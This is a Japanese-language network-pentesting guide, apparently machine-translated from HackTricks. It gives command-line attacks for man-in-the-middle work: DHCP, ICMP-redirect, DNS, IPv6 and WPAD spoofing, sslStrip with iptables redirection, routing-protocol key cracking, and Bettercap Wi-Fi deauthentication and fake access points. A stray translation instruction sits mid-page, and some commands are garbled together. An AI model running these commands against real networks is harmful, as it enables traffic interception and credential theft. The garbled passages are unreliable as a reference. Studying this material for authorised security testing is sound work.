EIGRPシステムを攻撃するには、正当なEIGRPルーターとの近隣関係を確立する必要があり、基本的な偵察からさまざまな注入まで、多くの可能性が開かれます。

****FRRoutingを使用すると、BGP、OSPF、EIGRP、RIPなどのプロトコルをサポートする仮想ルーターを実装できます。攻撃者のシステムにデプロイするだけで、ルーティングドメイン内の正当なルーターのふりをすることができます。

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

****ColyもEIGRPブロードキャストのキャプチャと、ルーティング設定を操作するためのパケットの注入をサポートしています。Colyを使った攻撃方法の詳細については、書籍 Network Security Assessment: Know Your Network (第3版) を参照してください。

OSPF

ほとんどのOpen Shortest Path First（OSPF）実装では、ルーター間の認証にMD5を使用しています。LokiとJohn the RipperはMD5ハッシュをキャプチャして攻撃し、キーを明らかにすることができ、それを使用して新しいルートを広告することができます。ルートパラメーターは_Injection_タブを使用して設定され、キーは_Connection_の下で設定されます。

このプロトコルを攻撃する方法の詳細については、書籍 Network Security Assessment: Know Your Network (第3版) を参照してください。

その他の一般的なツールと情報源

• Above: ネットワークトラフィックをスキャンし、脆弱性を見つけるツール
• ネットワーク攻撃に関するさらなる情報はこちらで見つけることができます。(TODO: 全てを読み、新しい攻撃があれば追加する)

スプーフィング

攻撃者は、偽のDHCPレスポンスを送信することで、ネットワークの新しいメンバーのすべてのネットワークパラメーター（GW、IP、DNS）を設定します。

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

前のセクションを確認してください。

ICMPRedirect

ICMP Redirectは、攻撃者がIPに到達する最良の方法であることを示すICMPパケットタイプ1コード5を送信することで構成されます。その後、被害者がIPに連絡を取りたい場合、パケットを攻撃者を経由して送信します。

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

攻撃者は、被害者が要求するドメインの一部（または全部）を解決します。

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

dnsmasqを使用して独自のDNSを設定する

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

ローカルゲートウェイ

システムやネットワークへの複数のルートが存在することがあります。ローカルネットワーク内のMACアドレスのリストを作成した後、gateway-finder.py を使用してIPv4フォワーディングをサポートするホストを特定します。

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

LLMNR、NBT-NS、およびmDNSのスプーフィング

Microsoftのシステムは、DNSルックアップが失敗したときにローカルホスト解決のためにLink-Local Multicast Name Resolution (LLMNR)とNetBIOS Name Service (NBT-NS)を使用します。AppleのBonjourやLinuxのゼロコンフィギュレーション実装は、ネットワーク内のシステムを発見するためにMulticast DNS (mDNS)を使用します。これらのプロトコルは認証されておらず、UDPを介してメッセージをブロードキャストするため、攻撃者はこれらを悪用してユーザーを悪意のあるサービスに誘導することができます。

Responderを使用して、ホストが検索するサービスを偽装し、偽の応答を送信することができます。
Responderでサービスを偽装する方法についての詳細はこちらを読んでください。

WPADのスプーフィング

多くのブラウザは、Web Proxy Auto-Discovery (WPAD)を使用してネットワークからプロキシ設定を読み込みます。WPADサーバーは、以下のいずれかを通じて特定された場合、特定のURL（例：http://wpad.example.org/wpad.dat）を介してクライアントプロキシ設定を提供します：

• DHCPを使用し、コード252エントリ34を使用
• ローカルドメインで_wpad_ホスト名を検索するDNS
• DNSルックアップが失敗した場合のMicrosoft LLMNRおよびNBT-NS

ResponderはWPAD攻撃を自動化します—プロキシを実行し、DHCP、DNS、LLMNR、NBT-NSを介してクライアントを悪意のあるWPADサーバーに誘導します。
Responderでサービスを偽装する方法についての詳細はこちらを読んでください。

SSDPおよびUPnPデバイスのスプーフィング

ネットワーク内で異なるサービスを提供し、ユーザーをだまして 平文の資格情報を入力させることができます。この攻撃に関する詳細は SSDPおよびUPnPデバイスのスプーフィングで確認できます。

IPv6ネイバースプーフィング

この攻撃はARPスプーフィングに非常に似ていますが、IPv6の世界で行われます。攻撃者のMACがGWのIPv6であると被害者に思わせることができます。

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 ルーター広告スプーフィング/フラッディング

一部のOSは、ネットワーク内で送信されるRAパケットからデフォルトゲートウェイを設定します。攻撃者をIPv6ルーターとして宣言するには、次の方法を使用できます：

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP スプーフィング

デフォルトでは、一部のOSはネットワーク内のDHCPv6パケットを読んでDNSを設定しようとします。その後、攻撃者は自身をDNSとして設定するためのDHCPv6パケットを送信することができます。DHCPは被害者にIPv6も提供します。

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (偽ページとJSコードインジェクション)

インターネット攻撃

sslStrip

この攻撃は基本的に、ユーザーがHTTPSバージョンにリダイレクトされるHTTPページにアクセスしようとした場合に、sslStripはクライアントとのHTTP接続を維持し、サーバーとのHTTPS接続を維持することで、平文での接続を嗅ぎ取ることができます。

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

以下は、HSTSをバイパスするためのsslStrip+とdns2proxyについての情報です。

sslStrip+とdns2proxyによるHSTSのバイパス

sslStrip+とdns2proxyとsslStripの違いは、例えば_www.facebook.comをwwww.facebook.com（注目：追加の"w"）にリダイレクトし、このドメインのアドレスを攻撃者のIPとして設定することです。この方法で、クライアントはwwww.facebook.com_（攻撃者）に接続しますが、裏ではsslstrip+がwww.facebook.comとの実際の接続をhttpsで維持します。

この技術の目的はHSTSを回避することです。なぜなら_wwww.facebook.com_はブラウザのキャッシュに保存されないため、ブラウザはHTTPでのfacebook認証を行うと騙されます。
この攻撃を行うためには、被害者が最初にhttp://www.faceook.comにアクセスしようとする必要があり、httpsではないことに注意してください。これは、httpページ内のリンクを変更することで実行できます。

詳細はこちら、こちら、そしてこちらで確認できます。

sslStripやsslStrip+はもう機能しません。これは、ブラウザに予め保存されたHSTSルールがあるためで、ユーザーが「重要な」ドメインに初めてアクセスする場合でもHTTPS経由でアクセスすることになります。また、予め保存されたルールやその他の生成されたルールがincludeSubdomainsフラグを使用する可能性があるため、前述の_wwww.facebook.comの例はもう機能しないことに注意してください。なぜならfacebook.com_はincludeSubdomainsを使用してHSTSを使用しているからです。

TODO: easy-creds, evilgrade, metasploit, factory

TCPポートでのリッスン

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL ポートでのリッスン

キーと自己署名証明書の生成

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

証明書を使用してリッスン

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

証明書を使用してリッスンし、ホストにリダイレクトする

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

以下は、ハッキング技術についてのハッキング書籍の内容です。ファイル generic-methodologies-and-resources/pentesting-network/README.md からの関連する英語テキストを日本語に翻訳し、まったく同じマークダウンおよびHTML構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名（Workspace、aws、gcpなど）、単語「leak」、ペネトレーションテスト、およびマークダウンタグのようなものは翻訳しないでください。また、翻訳とマークダウン構文以外の余分なものは何も追加しないでください。

---

クライアントがCAが有効であるかを確認する場合、他のホスト名の証明書をCAによって署名されたものとして提供することができます。
また、興味深いテストとしては、要求されたホスト名の証明書を自己署名で提供することです。

テストする他のことには、有効な証明書で証明書に署名しようとするが、それが有効なCAではない場合や、有効な公開鍵を使用し、実際の秘密鍵で何も復号化する必要がないアルゴリズム（例えばディフィー・ヘルマン）を強制的に使用し、クライアントが実際の秘密鍵の証明（ハッシュのようなもの）を要求したときに偽の証明を送信し、クライアントがこれをチェックしないことを期待することです。

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

アクティブディスカバリーノート

UDPパケットが要求されたポートを持たないデバイスに送信されると、ICMP（ポート到達不能）が送信されることに注意してください。

ARPディスカバリー

ARPパケットは、ネットワーク内でどのIPアドレスが使用されているかを発見するために使用されます。PCは可能なIPアドレスごとにリクエストを送信し、使用中のものだけが応答します。

mDNS（マルチキャストDNS）

BettercapはMDNSリクエストを（Xミリ秒ごとに）送信し、_services_.dns-sd._udp.localに対する応答を求めます。このパケットを見たマシンは通常、このリクエストに応答します。その後、"services"に応答するマシンのみを探します。

ツール

• Avahi-browser (--all)
• Bettercap (net.probe.mdns)
• Responder

NBNS（NetBios名前サーバー）

Bettercapは137/UDPポートにパケットをブロードキャストし、名前"CKAAAAAAAAAAAAAAAAAAAAAAAAAAA"に対する応答を求めます。

SSDP（シンプルサービスディスカバリープロトコル）

BettercapはSSDPパケットをブロードキャストし、あらゆる種類のサービスを検索します（UDPポート1900）。

WSD（ウェブサービスディスカバリー）

BettercapはWSDパケットをブロードキャストし、サービスを検索します（UDPポート3702）。

参考文献

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

バグバウンティのヒント: Intigritiに登録し、ハッカーのために作られたプレミアムなバグバウンティプラットフォームに参加しましょう！https://go.intigriti.com/hacktricksで今日から、最大**$100,000**の報酬を獲得し始めましょう！

{% embed url="https://go.intigriti.com/hacktricks" %}

AWSハッキングをゼロからヒーローまで学ぶには htARTE（HackTricks AWS Red Team Expert）をご覧ください！

HackTricksをサポートする他の方法:

• HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
• 公式PEASS & HackTricksグッズを入手する
• The PEASS Familyを発見し、独占的なNFTコレクションをチェックする
• 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。